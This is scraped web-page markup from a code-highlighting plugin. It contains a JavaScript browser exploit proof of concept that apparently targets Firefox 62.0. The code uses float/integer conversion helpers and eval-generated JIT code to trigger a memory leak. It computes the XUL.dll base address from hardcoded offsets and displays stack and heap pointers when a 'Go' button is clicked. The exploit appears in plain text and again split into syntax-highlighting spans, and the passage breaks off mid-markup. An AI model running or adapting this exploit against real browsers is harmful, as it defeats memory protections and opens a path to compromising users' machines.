u32[0] = x % BASE;      u32[1] = (x &#8211; (x % BASE)) \/ BASE; \/\/\/      return f64[0];  }    function f2i(x) {      f64[0] = x;      return u32[0] + BASE * u32[1];  }    function hex(x) {      return `0x${x.toString(16)}`  }    var test = {a:0x1337};    function gen(m) {      var expr = &#8216;1+(&#8216;.repeat(m) + &#8216;{a:y}&#8217; + &#8216;)&#8217;.repeat(m);        var code = `      f = function(o) {          var y = test;          var a = [o];          a.length = a[0];          var useless = function() { }          useless + useless + useless + useless + useless + useless;          var sz = Array.prototype.push.call(a, 1337, 43);          (function() { sz; })();          var o = ${expr};      }      `;      eval(code);  }    VERSION = &#8216;62.0&#8217;;    function exploit() {      var xul = 0;      var stack = 0;      var heap = 0;        var leak = [];      for (var i = 20; i &gt;= 0; &#8211;i) {          gen(i);          for (var j = 0; j &lt; 10000; j++) {              f(1);          }          f(100);            var x = f2i(test.a);            leak.push(x);      }        function xulbase(addr) {          if (VERSION == &#8216;62.0&#8217;) {              var offsets = [                  0x92fe34,                  0x3bd4108,              ];          } else {              alert(&#8216;Unknown version: &#8216; + VERSION);              throw null;          }          var res = 0;          offsets.forEach((offset) =&gt; {              if (offset % 0x1000 == addr % 0x1000) {                  res = addr &#8211; offset;              }          });          return res;      }        xul = xulbase(leak[1]);      stack = leak[0];      heap = leak[3];        var el = document.createElement(&#8216;pre&#8217;);      el.innerText = (          &#8220;XUL.dll base: &#8221; + hex(xul) + &#8220;n&#8221; +          &#8220;Stack: &#8221; + hex(stack) + &#8220;n&#8221; +          &#8220;Heap: &#8221; + hex(heap) + &#8220;n&#8221; +          &#8220;nFull leak:n&#8221; + leak.map(hex).join(&#8220;n&#8221;))      document.body.appendChild(el);  }  &lt;\/script&gt;    &lt;button onclick=&#8221;exploit()&#8221;&gt;Go&lt;\/button&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bbd2958b124c514799649-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bbd2958b124c514799649-97\">97<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-1\"><span class=\"crayon-ta\">&lt;script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-3\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">convert<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x100<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-4\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">u32<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint32Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">convert<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-5\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">f64<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Float64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">convert<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-7\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BASE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x100000000<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-9\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">i2f<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">u32<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BASE<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">u32<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BASE<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BASE<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">f64<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-13\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-15\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">f2i<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f64<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">u32<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BASE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">u32<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-18\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-20\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-cn\">0x<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toString<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">16<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-22\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-24\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">test<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0x1337<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-26\"><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">gen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">m<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">expr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;1+(&#8216;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">repeat<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">m<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{a:y}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;)&#8217;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">repeat<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">m<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-28\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">y<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">test<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">useless<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sz<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">Array<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">prototype<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">push<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">call<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1337<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">43<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bbd2958b124c514799649-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sz<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bbd2958b124c514799649-38\"><span 